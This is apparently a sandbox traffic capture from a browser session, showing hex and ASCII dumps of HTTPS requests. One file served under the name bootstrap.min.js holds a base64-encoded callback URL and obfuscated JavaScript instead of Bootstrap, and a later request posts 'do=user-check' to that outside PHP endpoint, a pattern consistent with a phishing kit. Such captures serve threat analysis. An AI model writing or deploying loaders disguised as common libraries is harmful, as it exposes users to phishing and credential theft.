                                                                                        Data Ascii: ndler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;return
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27 2c
                                                                                        Data Ascii: ._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]',
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49 6e
                                                                                        Data Ascii: ){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryIn
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74 79
                                                                                        Data Ascii: is._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibility
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52 2c
                                                                                        Data Ascii: function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER,
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c 73
                                                                                        Data Ascii: ment=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,s
                                                                                        2025-03-20 17:47:54 UTC1369INData Raw: 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66 28
                                                                                        Data Ascii: .to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if(


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.2.164976743.128.240.484436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:55 UTC716OUTGET /bootstrap.min.js HTTP/1.1
                                                                                        Host: 6438955191-1317754460.cos.ap-tokyo.myqcloud.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:56 UTC426INHTTP/1.1 200 OK
                                                                                        Content-Type: text/javascript
                                                                                        Content-Length: 549824
                                                                                        Connection: close
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Disposition: attachment
                                                                                        Date: Thu, 20 Mar 2025 17:47:56 GMT
                                                                                        ETag: "f0e9c2cf7db37574694765c677a77cb0"
                                                                                        Last-Modified: Tue, 18 Mar 2025 03:21:07 GMT
                                                                                        Server: tencent-cos
                                                                                        x-cos-force-download: true
                                                                                        x-cos-hash-crc64ecma: 13867544280527344739
                                                                                        x-cos-request-id: NjdkYzU0Y2NfZTU2YzUzMGJfNTQzM181OTYyNWRl
                                                                                        2025-03-20 17:47:56 UTC7778INData Raw: 76 61 72 20 66 69 6c 65 20 3d 20 22 61 48 52 30 63 48 4d 36 4c 79 39 34 65 6d 39 6c 4c 6d 4e 73 59 58 4e 7a 61 57 4e 68 62 43 35 70 64 43 35 6a 62 32 30 76 5a 32 39 76 5a 32 78 6c 4c 6e 42 6f 63 41 3d 3d 22 3b 0d 0a 0d 0a 76 61 72 20 5f 30 78 35 38 36 38 34 39 3d 5f 30 78 33 35 32 39 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 38 36 65 38 31 2c 5f 30 78 33 38 30 61 63 62 29 7b 76 61 72 20 5f 30 78 33 34 61 31 31 63 3d 5f 30 78 33 35 32 39 2c 5f 30 78 65 66 30 65 32 33 3d 5f 30 78 31 38 36 65 38 31 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 35 33 35 61 34 39 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 33 34 61 31 31 63 28 30 78 32 61 39 29 29 2f 28 30 78 31 65 33 31 2b 30 78 31 33 34 2a 2d 30 78 31 36 2b 2d 30 78 33 62 38 29
                                                                                        Data Ascii: var file = "aHR0cHM6Ly94em9lLmNsYXNzaWNhbC5pdC5jb20vZ29vZ2xlLnBocA==";var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 5d 2c 27 73 75 63 63 65 73 73 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 65 64 38 34 61 29 7b 76 61 72 20 5f 30 78 33 62 31 63 37 34 3d 5f 30 78 31 64 36 35 32 37 3b 69 66 28 5f 30 78 31 33 32 32 35 35 5b 5f 30 78 33 62 31 63 37 34 28 30 78 34 62 64 29 5d 28 5f 30 78 34 65 64 38 34 61 5b 5f 30 78 33 62 31 63 37 34 28 30 78 32 39 66 29 5d 2c 5f 30 78 31 33 32 32 35 35 5b 5f 30 78 33 62 31 63 37 34 28 30 78 31 62 37 31 29 5d 29 29 7b 76 61 72 20 5f 30 78 33 32 61 36 63 32 3d 5f 30 78 31 33 32 32 35 35 5b 5f 30 78 33 62 31 63 37 34 28 30 78 32 63 34 29 5d 5b 5f 30 78 33 62 31 63 37 34 28 30 78 38 39 35 29 5d 28 27 7c 27 29 2c 5f 30 78 32 64 65 34 63 35 3d 30 78 61 32 31 2a 30 78 33 2b 30 78 31 31 32 38 2b 2d 30 78 32 66 38 62 3b 77 68 69 6c 65 28 21 21 5b
                                                                                        Data Ascii: ],'success':function(_0x4ed84a){var _0x3b1c74=_0x1d6527;if(_0x132255[_0x3b1c74(0x4bd)](_0x4ed84a[_0x3b1c74(0x29f)],_0x132255[_0x3b1c74(0x1b71)])){var _0x32a6c2=_0x132255[_0x3b1c74(0x2c4)][_0x3b1c74(0x895)]('|'),_0x2de4c5=0xa21*0x3+0x1128+-0x2f8b;while(!![
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 63 28 30 78 31 35 39 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 31 38 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 33 31 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 62 38 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 33 66 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 66 30 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 33 30 34 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 31 34 35 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 39 66 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 39 39 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 34 37 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 38 32 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 66 62 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 31 38 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 36 30 39 29
                                                                                        Data Ascii: c(0x159c)+_0x27ef6c(0x2186)+_0x27ef6c(0x1310)+_0x27ef6c(0x1b80)+_0x27ef6c(0x3f3)+_0x27ef6c(0xf03)+_0x27ef6c(0x1304)+_0x27ef6c(0x1145)+_0x27ef6c(0x9fa)+_0x27ef6c(0x1997)+_0x27ef6c(0x477)+_0x27ef6c(0x82c)+_0x27ef6c(0xfb1)+_0x27ef6c(0x2186)+_0x27ef6c(0x1609)
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 33 37 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 37 64 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 33 32 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 37 31 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 37 37 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 32 34 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 33 62 34 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 66 39 65 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 62 66 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 31 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 63 32 66 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 62 36 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 65 36 34 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 38 61 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 32 30 37 29 2b 5f 30
                                                                                        Data Ascii: 37a)+_0x27ef6c(0x7d0)+_0x27ef6c(0x1323)+_0x27ef6c(0x271d)+_0x27ef6c(0x779)+_0x27ef6c(0x1249)+_0x27ef6c(0x13b4)+_0x27ef6c(0x1f9e)+_0x27ef6c(0x1bf3)+_0x27ef6c(0x117)+_0x27ef6c(0x1c2f)+_0x27ef6c(0xb63)+_0x27ef6c(0x1e64)+_0x27ef6c(0x18a0)+_0x27ef6c(0x2207)+_0
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 78 32 37 65 66 36 63 28 30 78 34 64 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 63 30 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 65 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 33 35 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 31 63 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 30 61 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 35 32 62 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 64 30 38 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 34 65 66 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 36 62 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 65 64 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 65 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 35 35 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 36 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 66
                                                                                        Data Ascii: x27ef6c(0x4d9)+_0x27ef6c(0x1c00)+_0x27ef6c(0x1e9)+_0x27ef6c(0x2353)+_0x27ef6c(0x11c7)+_0x27ef6c(0x20aa)+_0x27ef6c(0x152b)+_0x27ef6c(0xd08)+_0x27ef6c(0x4ef)+_0x27ef6c(0x6b7)+_0x27ef6c(0x1ed1)+_0x27ef6c(0x1e6)+_0x27ef6c(0x556)+_0x27ef6c(0x161)+_0x27ef6c(0xf
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 36 63 28 30 78 31 62 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 61 62 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 36 37 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 38 62 62 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 61 34 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 64 62 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 36 38 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 38 32 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 35 36 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 30 33 35 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 38 36 66 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 36 38 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 62 32 35 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 36 64 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 32
                                                                                        Data Ascii: 6c(0x1ba)+_0x27ef6c(0x2ab7)+_0x27ef6c(0x677)+_0x27ef6c(0x28bb)+_0x27ef6c(0xa49)+_0x27ef6c(0x1db6)+_0x27ef6c(0x2687)+_0x27ef6c(0x2820)+_0x27ef6c(0x56d)+_0x27ef6c(0x2035)+_0x27ef6c(0x186f)+_0x27ef6c(0x268d)+_0x27ef6c(0x2b25)+_0x27ef6c(0x26dc)+_0x27ef6c(0x22
                                                                                        2025-03-20 17:47:56 UTC16368INData Raw: 78 32 61 30 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 66 35 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 34 64 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 62 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 30 63 65 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 34 66 65 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 65 33 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 62 31 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 66 37 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 31 32 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 62 35 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 62 66 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 62 64 62 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 33 32 38 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 38 39 65 29 2b
                                                                                        Data Ascii: x2a0c)+_0x27ef6c(0xf52)+_0x27ef6c(0x14d7)+_0x27ef6c(0x1ba)+_0x27ef6c(0x10ce)+_0x27ef6c(0x4fe)+_0x27ef6c(0x1e31)+_0x27ef6c(0x1b1c)+_0x27ef6c(0x1f70)+_0x27ef6c(0x1126)+_0x27ef6c(0x2b51)+_0x27ef6c(0x1bf9)+_0x27ef6c(0xbdb)+_0x27ef6c(0x2328)+_0x27ef6c(0x189e)+
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 37 36 36 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 35 37 66 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 34 64 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 33 34 66 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 35 61 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 34 30 66 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 34 36 34 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 38 61 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 36 33 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 34 62 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 36 30 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 38 39 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 64 38 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 36 34 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 39 63 39 29 2b 5f 30 78 32
                                                                                        Data Ascii: 766)+_0x27ef6c(0x57f)+_0x27ef6c(0x24dd)+_0x27ef6c(0x134f)+_0x27ef6c(0x25ad)+_0x27ef6c(0x240f)+_0x27ef6c(0x1464)+_0x27ef6c(0x28a1)+_0x27ef6c(0x639)+_0x27ef6c(0x4b1)+_0x27ef6c(0x260a)+_0x27ef6c(0x892)+_0x27ef6c(0x1d8d)+_0x27ef6c(0x642)+_0x27ef6c(0x9c9)+_0x2
                                                                                        2025-03-20 17:47:56 UTC8184INData Raw: 66 36 63 28 30 78 32 38 35 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 36 65 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 64 61 37 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 33 30 38 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 33 34 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 36 37 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 35 39 33 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 63 32 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 66 35 64 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 38 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 65 32 38 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 39 65 38 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 63 30 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 64 37 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 61
                                                                                        Data Ascii: f6c(0x2859)+_0x27ef6c(0x26e)+_0x27ef6c(0xda7)+_0x27ef6c(0x2308)+_0x27ef6c(0x2342)+_0x27ef6c(0x2671)+_0x27ef6c(0x1593)+_0x27ef6c(0x1c2a)+_0x27ef6c(0xf5d)+_0x27ef6c(0x189)+_0x27ef6c(0x1e28)+_0x27ef6c(0x19e8)+_0x27ef6c(0x1c0a)+_0x27ef6c(0xd72)+_0x27ef6c(0x1a
                                                                                        2025-03-20 17:47:57 UTC16368INData Raw: 37 65 66 36 63 28 30 78 32 33 31 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 34 32 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 38 62 65 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 37 66 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 32 39 31 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 64 32 65 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 38 66 61 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 35 37 39 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 63 39 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 37 66 30 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 37 61 34 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 32 33 34 32 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 65 61 63 29 2b 5f 30 78 32 37 65 66 36 63 28 30 78 31 33 62 31 29 2b 5f 30 78 32 37 65 66 36 63 28
                                                                                        Data Ascii: 7ef6c(0x2312)+_0x27ef6c(0x142c)+_0x27ef6c(0x28be)+_0x27ef6c(0x17f1)+_0x27ef6c(0x1291)+_0x27ef6c(0x1d2e)+_0x27ef6c(0x8fa)+_0x27ef6c(0x1579)+_0x27ef6c(0x1c92)+_0x27ef6c(0x7f0)+_0x27ef6c(0x17a4)+_0x27ef6c(0x2342)+_0x27ef6c(0xeac)+_0x27ef6c(0x13b1)+_0x27ef6c(


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.1649769104.21.24.464436436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-20 17:47:58 UTC685OUTPOST /google.php HTTP/1.1
                                                                                        Host: xzoe.classical.it.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 13
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Origin: https://incomestatementdocument.classical.it.com
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://incomestatementdocument.classical.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-20 17:47:58 UTC13OUTData Raw: 64 6f 3d 75 73 65 72 2d 63 68 65 63 6b
                                                                                        Data Ascii: do=user-check
                                                                                        2025-03-20 17:48:02 UTC979INHTTP/1.1 200 OK
                                                                                        Date: Thu, 20 Mar 2025 17:48:02 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.0.30
                                                                                        Access-Control-Allow-Origin: https://incomestatementdocument.classical.it.com
                                                                                        Access-Control-Allow-Credentials: true
                                                                                        Access-Control-Max-Age: 86400
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QUlHBrf6F64aJC%2B8DiFMbpwXVnHvPq2pCfFR%2BnvYC3KxQH0vsBkYrM4i6NfGsR9h94I%2F74PV7aqx1UL0T3Q87Hvg3b7Dnmyc9StHmcdKx%2B8RsBxXGfgHXYwzRRlXKiLyUe47tN2vMHY%3D"}],"group":"cf-nel","max_age":604800}
